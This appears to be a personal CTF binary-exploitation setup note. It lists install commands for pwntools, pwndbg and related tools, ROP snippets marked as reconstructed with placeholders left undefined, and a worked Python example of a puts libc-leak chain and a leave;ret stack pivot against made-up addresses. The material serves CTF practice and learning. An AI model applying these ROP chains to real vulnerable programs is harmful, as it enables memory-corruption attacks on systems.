pwn
Environment setup
Got a new machine, so I am setting up the environment again and sorting out the various tools.
pwntools
sudo apt-get update
sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
sudo python3 -m pip install --upgrade pip
sudo python3 -m pip install --upgrade pwntools
Learned how to use the ROP class. The snippet below is reconstructed from a garbled original: ret (a plain ret gadget), stack (the address of the fake frame) and the argument to elfs.append() were not legible, so they are marked rather than guessed.
from pwn import *

elf = ELF('./pwn')
rop = ROP(elf)
rop.puts(elf.got['puts'])          # call puts@plt with puts@got as the argument: leaks the libc address of puts
rop.raw(ret)                       # ret: address of a plain ret gadget, e.g. rop.find_gadget(['ret']).address
# the original also called rop.elfs.append(...) here; the argument was lost in the source
print(rop.dump())

rop = ROP(elf)
leave_ret = rop.find_gadget(['leave', 'ret']).address   # the original indexed rop.leave[0]
rop.raw(b'A' * 0x30 + p64(stack - 8) + p64(leave_ret))   # stack: fake frame address; after leave;ret, rsp lands on it
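The two snippets above are what the pwntools ROP class builds for you; the following is an added example (not part of the original post and not pwntools code) that hand-rolls the same two stages so the stack layout is visible: a byte-pattern gadget search, the puts(puts@got) leak chain, the leave;ret stack pivot, and turning the 6 leaked bytes into a libc base. The .text bytes, the PLT/GOT/main addresses, the puts offset and the leaked line are all constructed for the example.

```python
import struct


def p64(v):
    """Little-endian 8-byte pack, same as pwntools p64 on amd64."""
    return struct.pack("<Q", v)


# Constructed stand-in for the binary's .text section (not a real binary).
TEXT_BASE = 0x401000
TEXT = bytes.fromhex(
    "4889e5"    # mov rbp, rsp   (filler)
    "5fc3"      # pop rdi ; ret  -> 0x401003
    "90"        # nop            (filler)
    "c9c3"      # leave ; ret    -> 0x401006
    "4883c408"  # add rsp, 8     (filler)
    "c3"        # ret            (first bare ret is at 0x401004, inside pop rdi; ret)
)

# Constructed addresses standing in for elf.plt['puts'], elf.got['puts'], elf.symbols['main'].
PUTS_PLT = 0x401030
PUTS_GOT = 0x404018
MAIN = 0x401136

GADGETS = {
    "pop rdi; ret": b"\x5f\xc3",
    "leave; ret": b"\xc9\xc3",
    "ret": b"\xc3",
}


def find_gadget(pattern, text=TEXT, base=TEXT_BASE):
    """Address of the first byte-exact occurrence of `pattern` (a tiny stand-in for
    ROP.find_gadget). Real tools disassemble; byte matching is enough here because
    each pattern is a complete encoding that ends in ret, so any hit is executable."""
    off = text.find(pattern)
    if off < 0:
        raise LookupError("gadget not found: %r" % pattern)
    return base + off


class Chain:
    """Minimal amd64 SysV chain builder with the operations used above (raw, call)."""

    def __init__(self):
        self._parts = []

    def raw(self, value):
        self._parts.append(value if isinstance(value, bytes) else p64(value))
        return self

    def call(self, target, *args):
        # Only the first argument register (rdi) is modelled.
        arg_gadgets = [find_gadget(GADGETS["pop rdi; ret"])]
        if len(args) > len(arg_gadgets):
            raise ValueError("only %d argument(s) supported" % len(arg_gadgets))
        for gadget, arg in zip(arg_gadgets, args):
            self.raw(gadget).raw(arg)
        self.raw(target)
        return self

    def chain(self):
        return b"".join(self._parts)


def leak_chain():
    """Stage 1: puts(puts@got) prints the libc address of puts, then return to main."""
    rop = Chain()
    rop.call(PUTS_PLT, PUTS_GOT)
    rop.raw(find_gadget(GADGETS["ret"]))  # extra ret keeps rsp 16-byte aligned before main
    rop.raw(MAIN)
    return rop.chain()


def pivot_payload(fake_frame, overflow_len=0x30):
    """Stage 2: saved rbp <- fake_frame-8, return address <- leave;ret.
    The gadget does mov rsp, rbp (rsp = fake_frame-8), pop rbp (rsp = fake_frame),
    ret: so whatever chain was planted at fake_frame runs. That is why the -8."""
    leave_ret = find_gadget(GADGETS["leave; ret"])
    return b"A" * overflow_len + p64(fake_frame - 8) + p64(leave_ret)


def parse_leak(line, puts_offset):
    """puts prints a canonical user-space pointer as 6 bytes then a newline; pad to 8 and
    subtract the symbol's offset (libc.symbols['puts']) to get the libc base."""
    leaked = int.from_bytes(line[:6].ljust(8, b"\x00"), "little")
    return leaked - puts_offset


if __name__ == "__main__":
    print("stage 1:", leak_chain().hex())
    print("stage 2:", pivot_payload(0x404800).hex())
    # constructed leaked line: puts at 0x7ffff7628420, puts offset 0x84420 in that libc
    print("libc base: %#x" % parse_leak(b"\x20\x84\x62\xf7\xff\x7f\n", 0x84420))
```

With a real target the only things that change are the addresses: they come from ELF('./pwn').plt/.got/.symbols and ROP(elf).find_gadget instead of the constants above, and the leak line comes from r.recv(6) after the stage-1 chain returns into main.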
pwndbg
sudo apt-get install gdb
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh
After installation it may throw an error: on Python 3.10 and later, collections.Hashable no longer exists (it moved to collections.abc). Open the file with
code /mnt/c/Study_Code/pwndbg/pwndbg/memoize.py
and change
collections.Hashable --> collections.abc.Hashable
and it works.
LibcSearcher
pip3 install LibcSearcher
seccomp-tools
sudo apt install gcc ruby-dev
sudo gem install seccomp-tools
one_gadget
sudo gem install one_gadget
Usage: one_gadget <FILE|-b BuildID> [options]
-b, --build-id BuildID BuildID[sha1] of libc.
-f, --[no-]force-file Force search gadgets in file instead of build id first.
-l, --level OUTPUT_LEVEL The output level.
OneGadget automatically selects gadgets with higher successful probability.
Increase this level to ask OneGadget show more gadgets it found.
Default: 0
-n, --near FUNCTIONS/FILE Order gadgets by their distance to the given functions or to the GOT functions of the given file.
-r, --[no-]raw Output gadgets offset only, split with one space.
-s, --script exploit-script Run exploit script with all possible gadgets.
The script will be run as 'exploit-script $offset'.
--info BuildID Show version information given BuildID.
--base BASE_ADDRESS The base address of libc.
Default: 0
--version Current gem version.
glibc-all-in-one
git clone https://github.com/matrix1001/glibc-all-in-one.git